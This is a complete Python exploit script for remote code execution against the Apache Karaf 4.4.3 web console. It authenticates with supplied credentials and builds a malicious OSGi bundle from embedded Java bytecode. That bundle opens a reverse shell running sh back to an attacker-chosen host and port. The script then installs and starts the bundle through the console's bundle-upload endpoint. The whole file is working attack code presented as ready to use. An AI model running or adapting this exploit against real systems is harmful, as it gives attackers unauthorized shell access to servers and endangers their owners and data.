#!/usr/bin/python
# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
# --lhost=192.168.0.100 --lport=4444 \
# --creds=karaf:karaf
"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests
# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
"Bundle-Name: RevShell\n" \
"Bundle-Description: Bundle openning a reverse shell connection.\n" \
"Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
"Bundle-Vendor: VisionSpace\n" \
"Bundle-Version: 1.0.0\n" \
"Import-Package: org.osgi.framework\n" \
"Bundle-Activator: com.visionspace.osgi.revshell.Activator"
# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
b"\x32"
# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"
def parse():
"""
This function parses the command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="Karaf-Console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running Karaf Console",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=True)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=True)
parser.add_argument("--creds", dest="creds",
help="credentials in format <username:password>",
type=str, required=True)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
return parser.parse_args()
def extract_jsessionid(cookie):
"""
This function extracts the JSESSIONID from the cookie string.
"""
jsessionid = None
regex = re.findall("JSESSIONID=([^;]+)", cookie)
if len(regex) > 0:
jsessionid = regex[0]
return jsessionid
def authenticate(target, basic_auth):
"""
This function connects to the URL and retrieves the JSESSIONID
based on the Basic Authorization.
"""
jsessionid = None
headers = {
"Authorization": basic_auth
}
response = requests.get(target, headers=headers,
allow_redirects=False, timeout=10)
if (response.status_code == 302 and response.headers["Set-Cookie"]):
jsessionid = extract_jsessionid(response.headers["Set-Cookie"])
return jsessionid
def generate_payload(lhost, lport):
"""
This function generates the payload.
It replaces the template payload with the `lhost` and `lport` arguments.
"""
payload = None
lhost_byte_array = bytearray()
lhost_byte_array.append(len(lhost))
lhost_byte_array.extend(map(ord, lhost))
activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)
lport_str = str(lport)
lport_byte_array = bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(map(ord, lport_str))
activator_class_bytecodes = activator_class_bytecodes.replace(
ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)
jar_bytes = io.BytesIO()
with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
activator_class_bytecodes)
zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)
payload = jar_bytes.getvalue()
return payload
def deploy_payload(target, basic_auth, jsessionid, payload):
"""
This function connects to the Karaf Console and deployes the payload.
"""
success = False
url = f"{target}/bundles"
cookies = {
"JSESSIONID": jsessionid
}
headers = {
"Authorization": basic_auth
}
files = {
"bundlefile": (
"revshell.jar", payload, "application/x-java-archive")
}
data = {
"action": "install",
"bundlestart": "start",
"bundlestartlevel": 80
}
response = requests.post(url, headers=headers, cookies=cookies,
files=files, data=data, timeout=10,
allow_redirects=False)
if response.status_code == 302:
success = True
return success
def generate_basic_auth(creds):
"""
This function generates the Basic Authorization string based
on the credentials.
"""
creds_base64 = base64.b64encode(creds.encode()).decode()
basic_auth = f"Basic {creds_base64}"
return basic_auth
def create_target_url(rhost, rport):
"""
This function creates a target URL.
"""
target_url = f"http://{rhost}:{rport}/system/console"
return target_url
def main(args):
"""
Main function.
"""
target = create_target_url(args.rhost, args.rport)
print("[*] Login...")
basic_auth = generate_basic_auth(args.creds)
jsessionid = authenticate(target, basic_auth)
if jsessionid:
print("[+] Session established.")
print("[*] Generating payload...")
payload = generate_payload(args.lhost, args.lport)
if payload:
print("[*] Deploying payload...")
if deploy_payload(target, basic_auth, jsessionid, payload):
print("[+] Done.")
else:
print("[-] Failed to deploy the payload!")
else:
print("[-] Failed to generate the payload!")
else:
print("[-] Login failed!")
if __name__ == "__main__":
main(parse())